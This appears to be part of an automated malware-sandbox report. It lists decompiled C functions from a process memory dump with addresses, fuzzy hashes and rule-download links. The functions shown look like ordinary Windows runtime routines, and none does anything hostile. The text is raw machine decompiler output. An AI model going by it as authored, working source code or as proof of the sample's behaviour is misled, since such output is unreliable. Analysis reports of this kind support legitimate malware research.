				_t46 = 0;
				_v16 = __edx;
				_v25 = 0;
				_v12 = _t30;
				L04CC2330(_t30, 0x4da6d4c);
				_t57 =  *0x4da379c; // 0x77dc379c
				if(_t57 == 0x4da379c) {
					L10:
					E04CC24D0(0x4da6d4c);
					while(1) {
						_t33 = _v12;
						_t49 =  &_v12;
						if(_t33 == _t49) {
							goto L16;
						}
						if( *((intOrPtr*)(_t33 + 4)) != _t49) {
							goto L15;
						} else {
							_t51 =  *_t33;
							if( *((intOrPtr*)(_t51 + 4)) != _t33) {
								goto L15;
							} else {
								_v12 = _t51;
								 *((intOrPtr*)(_t51 + 4)) =  &_v12;
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
								continue;
							}
						}
						goto L16;
					}
				} else {
					do {
						_t7 = _t57 + 8; // 0x77dc37a4
						_t37 = _t7;
						_t46 = _t57;
						 *_t37 =  *_t37 + 1;
						_v20 = _t37;
						E04CC24D0(0x4da6d4c);
						 *0x4da91e0(_v28, _t60);
						if( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0xc))))() != 0) {
							_v33 = 1;
						}
						L04CC2330(_t40, 0x4da6d4c);
						_t42 = _v32;
						_t57 =  *_t57;
						 *_t42 =  *_t42 - 1;
						if( *_t42 != 0) {
							goto L8;
						} else {
							if( *((intOrPtr*)(_t57 + 4)) != _t46) {
								L15:
								_push(3);
								asm("int 0x29");
							} else {
								_t43 =  *((intOrPtr*)(_t46 + 4));
								if( *_t43 != _t46) {
									goto L15;
								} else {
									 *_t43 = _t57;
									_t53 =  &_v20;
									 *((intOrPtr*)(_t57 + 4)) = _t43;
									_t44 = _v16;
									if( *_t44 != _t53) {
										goto L15;
									} else {
										 *_t46 = _t53;
										 *((intOrPtr*)(_t46 + 4)) = _t44;
										 *_t44 = _t46;
										_v16 = _t46;
										goto L8;
									}
								}
							}
						}
						goto L16;
						L8:
						_t60 = _v24;
					} while (_t57 != 0x4da379c);
					_t46 = _v33;
					goto L10;
				}
				L16:
				return _t46;
			}

0x04d5e75e
0x04d5e762
0x04d5e766
0x04d5e768
0x04d5e76c
0x04d5e76e
0x04d5e777
0x04d5e77b
0x04d5e77f
0x04d5e784
0x04d5e790
0x04d5e80f
0x04d5e814
0x04d5e819
0x04d5e819
0x04d5e81d
0x04d5e823
0x00000000
0x00000000
0x04d5e828
0x00000000
0x04d5e82a
0x04d5e82a
0x04d5e82f
0x00000000
0x04d5e831
0x04d5e83c
0x04d5e842
0x04d5e848
0x00000000
0x04d5e848
0x04d5e82f
0x00000000
0x04d5e828
0x04d5e792
0x04d5e792
0x04d5e792
0x04d5e792
0x04d5e795
0x04d5e797
0x04d5e79e
0x04d5e7a2
0x04d5e7b1
0x04d5e7bb
0x04d5e7bd
0x04d5e7bd
0x04d5e7c7
0x04d5e7cc
0x04d5e7d0
0x04d5e7d2
0x04d5e7d5
0x00000000
0x04d5e7d7
0x04d5e7da
0x04d5e84f
0x04d5e84f
0x04d5e852
0x04d5e7dc
0x04d5e7dc
0x04d5e7e1
0x00000000
0x04d5e7e3
0x04d5e7e3
0x04d5e7e5
0x04d5e7e9
0x04d5e7ec
0x04d5e7f2
0x00000000
0x04d5e7f4
0x04d5e7f4
0x04d5e7f6
0x04d5e7f9
0x04d5e7fb
0x00000000
0x04d5e7fb
0x04d5e7f2
0x04d5e7e1
0x04d5e7da
0x00000000
0x04d5e7ff
0x04d5e7ff
0x04d5e803
0x04d5e80b
0x00000000
0x04d5e80b
0x04d5e854
0x04d5e85c

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7b648c91fbcf4d277977d35fb8a3bfed0d4d3671a74e4c00095a1228067b81
Instruction ID: 11b3a520ae066bc1331ccb75b7e76388b5168c201eea6f540c98057b17ad37a1
Opcode Fuzzy Hash: bd7b648c91fbcf4d277977d35fb8a3bfed0d4d3671a74e4c00095a1228067b81
Instruction Fuzzy Hash: 9C313E71905311DFCB10EF15C44455ABBE6FF89618F0886AEE8889B251DB30EE15CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CD42AF Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CD42AF(void* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t42;
				void* _t47;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t61;
				signed int _t64;
				void* _t65;

				_t65 = __ecx;
				_v8 = 0;
				if(__ecx == 0) {
					L17:
					return 0xc0000001;
				}
				 *(__ecx + 0x18) =  *(__ecx + 0x18) & 0;
				 *(__ecx + 0x1c) =  *(__ecx + 0x1c) & 0;
				if( *((short*)(__ecx + 4)) > 0x40) {
					goto L17;
				}
				_t51 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
				if(_t51 == 0) {
					return 0xc0000017;
				}
				_t64 = ( *(_t65 + 4) & 0x0000ffff) - 1;
				if(_t64 < 0) {
					L13:
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t51);
					return 0;
				}
				_v12 = _t64 * 6;
				do {
					_t42 = E04CF6600(1, _t64, 0);
					_v20 = 0;
					_t60 = _v12 +  *((intOrPtr*)(_t65 + 0x10));
					_v16 = _t42;
					if(0 ==  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_t65 + 0x10))))) {
						goto L12;
					}
					_t54 =  *0x4da6800; // 0x2f1fe10
					_v24 = _t51;
					_v28 = 0xaa0000;
					if(E04CD4443(_t54, _t60,  &_v28) < 0) {
						goto L12;
					}
					_t55 =  *0x4da6800; // 0x2f1fe10
					_t61 = _v24;
					if( *((intOrPtr*)(_t55 + 0x48)) < 0x3e8) {
						_t47 = E04CD4783(_t55, _t61, 1,  &_v8);
						L10:
						if(_t47 < 0) {
							goto L12;
						}
						L11:
						 *(_t65 + 0x18) =  *(_t65 + 0x18) | _v16;
						 *(_t65 + 0x1c) =  *(_t65 + 0x1c) | _v20;
						goto L12;
					}
					if(E04CD43AC(_t55, _t61) >= 0) {
						goto L11;
					}
					_t56 =  *0x4da6800; // 0x2f1fe10
					_t47 = E04CD2CB1(_t56, _v24);
					goto L10;
					L12:
					_v12 = _v12 - 6;
					_t64 = _t64 - 1;
				} while (_t64 >= 0);
				goto L13;
			}

0x04cd42b9
0x04cd42bd
0x04cd42c4
0x04d1b475
0x00000000
0x04d1b475
0x04cd42ca
0x04cd42cd
0x04cd42d5
0x00000000
0x00000000
0x04cd42f1
0x04cd42f5
0x00000000
0x04d1b45b
0x04cd42ff
0x04cd4302
0x04cd4394
0x04cd43a0
0x00000000
0x04cd43a5
0x04cd430b
0x04cd430e
0x04cd4315
0x04cd431a
0x04cd4320
0x04cd4323
0x04cd432b
0x00000000
0x00000000
0x04cd432d
0x04cd4337
0x04cd433a
0x04cd4348
0x00000000
0x00000000
0x04cd434a
0x04cd4350
0x04cd435a
0x04d1b46b
0x04cd4377
0x04cd4379
0x00000000
0x00000000
0x04cd437b
0x04cd437e
0x04cd4384
0x00000000
0x04cd4384
0x04cd4367
0x00000000
0x00000000
0x04cd436c
0x04cd4372
0x00000000
0x04cd4387
0x04cd4387
0x04cd438b
0x04cd438b
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7674c8d53fdd3dcd404186ba7d4e5bad5b352b00b7ced9ef0912efa8bc9611
Instruction ID: 18c7709ac4cc182976d0b2cd188b503b5999b84bf765325a6c815547def3ff2d
Opcode Fuzzy Hash: 6b7674c8d53fdd3dcd404186ba7d4e5bad5b352b00b7ced9ef0912efa8bc9611
Instruction Fuzzy Hash: CD319171B00605AFD724EFA9C985A6EB7FBEB44308F048429D746D7250D730F941DB95

Uniqueness

Uniqueness Score: -1.00%

Function 04D06F70 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04D06F70(intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed char _v8;
				intOrPtr* _v12;
				signed char* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed char _t34;
				intOrPtr _t51;
				intOrPtr* _t53;
				intOrPtr* _t56;
				intOrPtr _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				signed char* _t64;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr _t71;

				if(E04CC3C40() == 0) {
					_t53 = 0x7ffe03c8;
					_t64 = 0x7ffe025c;
					_t56 = 0x7ffe0020;
					_t6 = _t53 + 8; // 0x7ffe03d0
					_t68 = _t6;
				} else {
					_t51 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					_t64 = _t51 + 0x24c;
					_t56 = _t51 + 0x250;
					_t53 = _t51 + 0x260;
					_t68 = _t51 + 0x268;
				}
				_v28 = _t68;
				_v12 = _t53;
				_v20 = _t56;
				_v16 = _t64;
				while(1) {
					_t34 =  *_t64;
					_v8 = _t34;
					if((_t34 & 0x00000001) == 0) {
						goto L7;
					}
					L5:
					asm("pause");
					continue;
					while(1) {
						L7:
						_t58 =  *((intOrPtr*)(_t56 + 4));
						_v24 =  *_t56;
						if(_t58 ==  *((intOrPtr*)(_t56 + 8))) {
							break;
						}
						asm("pause");
					}
					_t69 = _a4;
					 *_t69 = _v24;
					_t70 = _v28;
					 *((intOrPtr*)(_t69 + 4)) = _t58;
					_t59 = _a8;
					if(_t59 != 0) {
						 *_t59 =  *_t53;
						 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t53 + 4));
					}
					_t60 = _a12;
					if(_t60 != 0) {
						 *_t60 =  *_t70;
						 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t70 + 4));
					}
					_t71 =  *0x7FFE0014;
					if( *0x7ffe0018 !=  *0x7ffe001c) {
						do {
							asm("pause");
							_t71 =  *0x7ffe0014;
						} while ( *0x7FFE0018 !=  *0x7FFE001C);
						_t56 = _v20;
						_t64 = _v16;
						_t53 = _v12;
					}
					if(_v8 !=  *_t64) {
						goto L5;
					}
					return _t71;
				}
			}

0x04d06f85
0x04d06faa
0x04d06faf
0x04d06fb4
0x04d06fb9
0x04d06fb9
0x04d06f87
0x04d06f8d
0x04d06f90
0x04d06f96
0x04d06f9c
0x04d06fa2
0x04d06fa2
0x04d06fbc
0x04d06fc0
0x04d06fc4
0x04d06fc8
0x04d06fcc
0x04d06fcc
0x04d06fce
0x04d06fd4
0x00000000
0x00000000
0x04d06fd6
0x04d06fd6
0x00000000
0x04d06fdc
0x04d06fdc
0x04d06fdc
0x04d06fe1
0x04d06fea
0x00000000
0x00000000
0x04d06fda
0x04d06fda
0x04d06fec
0x04d06ff3
0x04d06ff7
0x04d06ffb
0x04d06ffe
0x04d07003
0x04d07007
0x04d0700c
0x04d0700c
0x04d0700f
0x04d07014
0x04d07018
0x04d0701d
0x04d0701d
0x04d0702a
0x04d07035
0x04d07042
0x04d07042
0x04d07046
0x04d0704a
0x04d0704e
0x04d07052
0x04d07056
0x04d07056
0x04d07060
0x00000000
0x00000000
0x04d0706e
0x04d0706e

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction ID: 2c3da8905a24aaf0cb750f4a4c669ba293e792d223f865802528fd1ce1df0cac
Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction Fuzzy Hash: 39312475604206CFC710CF18C080A5ABBE6FF88314B2986AAE9589B365E731FD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CAC0F6 Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04CAC0F6(intOrPtr __ebx, intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v92;
				char _v132;
				char _v133;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				void* __esi;
				intOrPtr _t32;
				signed int _t34;
				intOrPtr* _t37;
				char _t40;
				void* _t44;
				intOrPtr _t56;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t63;
				void* _t64;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr _t78;
				void* _t82;
				intOrPtr _t85;
				signed char* _t86;
				void* _t87;
				signed int _t90;

				_t63 = __ebx;
				_push(__ecx);
				_t32 =  *0x4da664c; // 0x2f1c538
				_t85 = __ecx;
				_t34 = L04CC2330(_t32 + 0x18, _t32 + 0x18);
				asm("lock xadd [esi+0x14], eax");
				if((_t34 | 0xffffffff) == 1) {
					_t37 = _t85 + 8;
					_t78 =  *_t37;
					if( *((intOrPtr*)(_t78 + 4)) != _t37) {
						L7:
						_push(3);
						asm("int 0x29");
						_t7 = _t85 + 0x1c; // 0x1c
						_t81 = _t7;
						L04CB53C0(_t7);
						 *((intOrPtr*)(_t63 + 0xc8)) = _t85;
						E04D80962(_t63);
						_t79 = 4;
						_t9 = _t63 + 0x66; // 0x2f1c59a
						_t86 = _t9;
						_v140 = _t79;
						_v144 = 2;
						do {
							if( *((char*)(_t86 - 2)) == 0) {
								_t40 = _v133;
							} else {
								_t13 = _t63 + 0x36; // 0x2f2
								_t68 =  *_t13 & 0x0000ffff;
								if((_t68 & 0x00003fff) == _v144 || _t68 < 0) {
									_t68 =  *_t86 & 0x000000ff;
									E04CF1DA8( *_t86 & 0x000000ff, _t63);
									_t79 = _v140;
								}
								_t40 = 1;
								_v133 = 1;
							}
							_t86 =  &(_t86[0x18]);
							_t79 = _t79 - 1;
							_v140 = _t79;
						} while (_t79 != 0);
						if(_t40 == 0) {
							_t44 = E04CB52F0(_t68, _t81);
						} else {
							_t19 = _t63 + 0x36; // 0x2f2
							_t72 = 2;
							if(( *_t19 & 0x00003fff) == _t72) {
								E04CF8F40( &_v132, 0, 0x78);
								_t73 = _v148;
								_v28 =  *((intOrPtr*)(_t73 + 0x88));
								_v24 =  *((intOrPtr*)(_t73 + 0x8c));
								_v20 =  *((intOrPtr*)(_t73 + 0x90));
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E04CB52F0(_t73, _t73 + 0x1c);
								_t79 = _t63;
								_t44 = E04CADF21( &_v132, _t63, 1);
							} else {
								E04CB52F0(_t72, _t81);
								_t44 = E04D8099E(_t63);
							}
						}
						_pop(_t82);
						_pop(_t87);
						_pop(_t64);
						return E04CF4B50(_t44, _t64, _v8 ^ _t90, _t79, _t82, _t87);
					} else {
						_t76 =  *((intOrPtr*)(_t37 + 4));
						if( *_t76 != _t37) {
							goto L7;
						} else {
							_t56 =  *0x4da664c; // 0x2f1c538
							 *_t76 = _t78;
							 *((intOrPtr*)(_t78 + 4)) = _t76;
							E04CC24D0(_t56 + 0x18);
							_t60 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
							goto L2;
						}
					}
				} else {
					_t61 =  *0x4da664c; // 0x2f1c538
					_t60 = E04CC24D0(_t61 + 0x18);
					L2:
					return _t60;
				}
			}

0x04cac0f6
0x04cac0fb
0x04cac0fc
0x04cac105
0x04cac108
0x04cac110
0x04cac116
0x04d0d416
0x04d0d419
0x04d0d41e
0x04d0d450
0x04d0d450
0x04d0d453
0x04d0d455
0x04d0d455
0x04d0d459
0x04d0d460
0x04d0d466
0x04d0d46d
0x04d0d46e
0x04d0d46e
0x04d0d471
0x04d0d477
0x04d0d481
0x04d0d485
0x04d0d4ba
0x04d0d487
0x04d0d487
0x04d0d487
0x04d0d499
0x04d0d4a0
0x04d0d4a5
0x04d0d4aa
0x04d0d4aa
0x04d0d4b0
0x04d0d4b2
0x04d0d4b2
0x04d0d4c0
0x04d0d4c3
0x04d0d4c6
0x04d0d4c6
0x04d0d4d0
0x04d0d54e
0x04d0d4d2
0x04d0d4d2
0x04d0d4e0
0x04d0d4e4
0x04d0d500
0x04d0d505
0x04d0d51a
0x04d0d523
0x04d0d52c
0x04d0d532
0x04d0d534
0x04d0d535
0x04d0d536
0x04d0d537
0x04d0d53e
0x04d0d543
0x04d0d4e6
0x04d0d4e7
0x04d0d4ee
0x04d0d4ee
0x04d0d4e4
0x04cadc9c
0x04cadc9d
0x04cadca0
0x04cadca7
0x04d0d420
0x04d0d420
0x04d0d425
0x00000000
0x04d0d427
0x04d0d427
0x04d0d42f
0x04d0d432
0x04d0d435
0x04d0d446
0x00000000
0x04d0d446
0x04d0d425
0x04cac11c
0x04cac11c
0x04cac125
0x04cac12a
0x04cac12c
0x04cac12c

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bb7e6da0c4ce2e39a39153b927b6fc7c0c4432d89d3174757316362673b5a0
Instruction ID: 8dcbc35c4a50a24996a640a5d90848dd3cc5427f16e1262035fed4fec3c5a2d0
Opcode Fuzzy Hash: 29bb7e6da0c4ce2e39a39153b927b6fc7c0c4432d89d3174757316362673b5a0
Instruction Fuzzy Hash: 8E31E8719002009BD721AF58C845BA977B6FF4131CF48C1AAD9859B382DA38F985DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CAE3C0 Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E04CAE3C0(intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v264;
				void* _v265;
				char _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				signed int _v284;
				void* _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t29;
				intOrPtr _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t52;
				void* _t53;
				intOrPtr* _t55;
				void* _t56;
				signed int _t57;

				_v8 =  *0x4dab370 ^ _t57;
				_v284 = _v284 | 0xffffffff;
				_v276 = _a8;
				_t55 =  &_v264;
				_t44 = 0x100;
				_v280 = _a12;
				_v265 = 0;
				_v288 = 0xdc3cba00;
				do {
					_push( &_v272);
					_push(_t44);
					_push(_t55);
					_push(0);
					_push(0);
					_push(0x10);
					_t52 = E04CF45E0();
					if(_t52 < 0) {
						if(_t52 != 0xc0000023) {
							goto L3;
						}
						if(_t55 !=  &_v264) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
						}
						_t44 = _v272;
						_t55 = E04CC5D90(_t46,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t44);
						if(_t55 == 0) {
							_t29 = 1;
							L5:
							asm("sbb eax, eax");
							E04CB7AF0( &_v288, _v280, _v276,  ~(_t29 & 0x000000ff) &  &_v288, 0);
							_t34 =  &_v264;
							if(_t55 !=  &_v264) {
								if(_t55 != 0) {
									_t34 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
								}
							}
							_pop(_t53);
							_pop(_t56);
							_pop(_t45);
							return E04CF4B50(_t34, _t45, _v8 ^ _t57, _t50, _t53, _t56);
						} else {
							_t52 = 0x105;
							goto L3;
						}
					}
					E04CAE4F0(_t55);
					L3:
				} while (_t52 == 0x105);
				_t29 = _v265;
				goto L5;
			}

0x04cae3d2
0x04cae3d8
0x04cae3e1
0x04cae3e7
0x04cae3f0
0x04cae3f6
0x04cae3fc
0x04cae403
0x04cae40d
0x04cae413
0x04cae414
0x04cae415
0x04cae416
0x04cae418
0x04cae41a
0x04cae421
0x04cae425
0x04cae47f
0x00000000
0x00000000
0x04cae489
0x04cae4d5
0x04cae4d5
0x04cae48b
0x04cae4a2
0x04cae4a6
0x04cae4dc
0x04cae43b
0x04cae448
0x04cae459
0x04cae45e
0x04cae466
0x04cae4b4
0x04cae4c2
0x04cae4c2
0x04cae4b4
0x04cae46b
0x04cae46c
0x04cae46f
0x04cae476
0x04cae4a8
0x04cae4a8
0x00000000
0x04cae4a8
0x04cae4a6
0x04cae428
0x04cae42d
0x04cae42d
0x04cae435
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0568d4396071412d83c8945e54d4b099cf008664925bcaf6c97a4a779ac5f615
Instruction ID: fb889a344068f05bc0f22db017024d7477410131e2b0421efa86de49ffaee4ef
Opcode Fuzzy Hash: 0568d4396071412d83c8945e54d4b099cf008664925bcaf6c97a4a779ac5f615
Instruction Fuzzy Hash: 0E31F431A8052DABEB31DE54CC41FEEB7BEAB04708F0100A5E645A7290D674BE919FE0

Uniqueness

Uniqueness Score: -1.00%

Function 04CB6D91 Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E04CB6D91(void* __ecx, signed int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				void* _t48;
				signed int _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t58;
				void* _t59;
				void* _t61;
				signed int _t62;

				_t56 = __edx;
				_v8 =  *0x4dab370 ^ _t62;
				_t61 = __ecx;
				_t51 =  *((intOrPtr*)(__edx + 0xc8));
				_t58 = _a4;
				_v24 = _t51;
				_t34 =  *((intOrPtr*)(__ecx + 0x104));
				if(_t58 != _t51) {
					if(_t34 == 0xffffffff) {
						if( *((char*)(__edx + 0xd0)) == 0) {
							 *((char*)(__edx + 0xd0)) = 1;
						} else {
							asm("lock dec dword [eax+ecx*4]");
						}
						asm("lock inc dword [eax+edi*4]");
					}
					 *(_t56 + 0xc8) = _t58;
					_t52 =  *((intOrPtr*)(_t61 + 0x20));
					_push(_t48);
					_t49 =  *(_t58 * 0xc + _t52 + 4) & 0x0000ffff;
					_v28 =  *(_v24 * 0xc + _t52 + 4) & 0x0000ffff;
					if(E04CC3C40() == 0) {
						_t34 = 0x7ffe0386;
					} else {
						_t34 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t34 != 0) {
						_t56 = _v24;
						_t34 = E04D851B6(_t61, _v24, _t58, _v28, _t49);
					}
					if(_v28 != _t49) {
						asm("stosd");
						_push(0xc);
						asm("stosd");
						asm("stosd");
						_v20 = _v20 & 0x00000000;
						_push( &_v20);
						_push(0x1e);
						_push(0xfffffffe);
						_v16 = _t49;
						E04CF2A60();
						_push(4);
						_push( &_a8);
						_push(0xd);
						_push(0xfffffffe);
						_t34 = E04CF2A60();
					}
					_pop(_t48);
				} else {
					if(_t34 == 0xffffffff) {
						if( *((char*)(__edx + 0xd0)) == 0) {
							 *((char*)(__edx + 0xd0)) = 1;
							_t34 =  *((intOrPtr*)(__ecx + 0x1c));
							asm("lock inc dword [eax+edi*4]");
						}
					}
				}
				_pop(_t59);
				return E04CF4B50(_t34, _t48, _v8 ^ _t62, _t56, _t59, _t61);
			}

0x04cb6d91
0x04cb6da0
0x04cb6da4
0x04cb6da6
0x04cb6dad
0x04cb6db0
0x04cb6db3
0x04cb6dbb
0x04d113ca
0x04d113d3
0x04d113de
0x04d113d5
0x04d113d8
0x04d113d8
0x04d113e8
0x04d113e8
0x04d113ef
0x04d113f5
0x04d113f8
0x04d113f9
0x04d11407
0x04d11411
0x04d11423
0x04d11413
0x04d1141c
0x04d1141c
0x04d1142b
0x04d1142d
0x04d11437
0x04d11437
0x04d11440
0x04d11447
0x04d11448
0x04d1144a
0x04d1144b
0x04d1144f
0x04d11453
0x04d11454
0x04d11456
0x04d11458
0x04d1145c
0x04d11461
0x04d11466
0x04d11467
0x04d11469
0x04d1146b
0x04d1146b
0x04d11470
0x04cb6dc1
0x04cb6dc4
0x04d113ae
0x04d113b4
0x04d113bb
0x04d113be
0x04d113be
0x04d113ae
0x04cb6dc4
0x04cb6dcd
0x04cb6dd7

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d514103f0c9727c47d66503001286935bc5a590f4207a22c403a4b70f6c21299
Instruction ID: 0636a89b98664067c1f9035e7bd1f52df706204eb9bae8f5762209dbacac3ce3
Opcode Fuzzy Hash: d514103f0c9727c47d66503001286935bc5a590f4207a22c403a4b70f6c21299
Instruction Fuzzy Hash: 6331E230600209AAEB20DFA8D840BAEF7B5FF45318F14036AEA559B1E1DB74A985C791

Uniqueness

Uniqueness Score: -1.00%

Function 04CE44A8 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04CE44A8(intOrPtr __ecx, intOrPtr __edx, void* _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t32;
				signed int _t33;
				intOrPtr _t42;
				signed int _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				signed int _t53;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				signed int _t67;

				_t32 = _a8;
				_t46 = 0x18;
				_t59 = __edx;
				_v12 = __ecx;
				_t33 = _t32 * _t46;
				_t67 = _t32 * _t46 >> 0x20;
				if(_t67 < 0 || _t67 <= 0 && _t33 <= 0xffffffff) {
					_v8 = _t33;
					if(E04CE457E(_t33, _t46,  &_v8) < 0) {
						goto L12;
					}
					_t52 = _v8;
					_push( &_v8);
					_t57 = 8;
					if(E04CE457E(_v8, _t57) < 0) {
						goto L12;
					}
					_t47 = E04CC5D90(_t52,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
					_v16 = _t47;
					if(_t47 == 0) {
						goto L12;
					}
					E04CF8F40(_t47, 0, _v8);
					 *((intOrPtr*)(_t47 + 4)) = _t59;
					 *_t47 = _v12;
					_t20 = _t47 + 0x20; // 0x20
					_t42 = _t20;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_a8 <= 0) {
						L10:
						return _t47;
					}
					_t58 = _a12;
					_t53 = 0;
					_t48 = _t42;
					do {
						 *((intOrPtr*)(_t58 + 4 + _t53 * 8)) = _t48;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)( *[fs:0x18] + 0x20));
						_t48 = _t48 + 0x18;
						_t53 = _t53 + 1;
					} while (_t53 < _a8);
					_t47 = _v16;
					goto L10;
				} else {
					L12:
					return 0;
				}
			}

0x04ce44b0
0x04ce44b8
0x04ce44b9
0x04ce44bb
0x04ce44be
0x04ce44c2
0x04ce44c4
0x04ce44d8
0x04ce44e7
0x00000000
0x00000000
0x04ce44ed
0x04ce44f3
0x04ce44f6
0x04ce44fe
0x00000000
0x00000000
0x04ce4513
0x04ce4515
0x04ce451a
0x00000000
0x00000000
0x04ce4521
0x04ce4533
0x04ce4539
0x04ce453b
0x04ce453b
0x04ce453e
0x04ce453f
0x04ce4540
0x04ce4541
0x04ce4542
0x04ce4571
0x00000000
0x04ce4571
0x04ce4544
0x04ce4547
0x04ce4549
0x04ce454b
0x04ce4557
0x04ce455b
0x04ce455c
0x04ce455d
0x04ce455e
0x04ce4562
0x04ce4565
0x04ce4568
0x04ce4569
0x04ce456e
0x00000000
0x04ce457a
0x04ce457a
0x00000000
0x04ce457a

Memory Dump Source

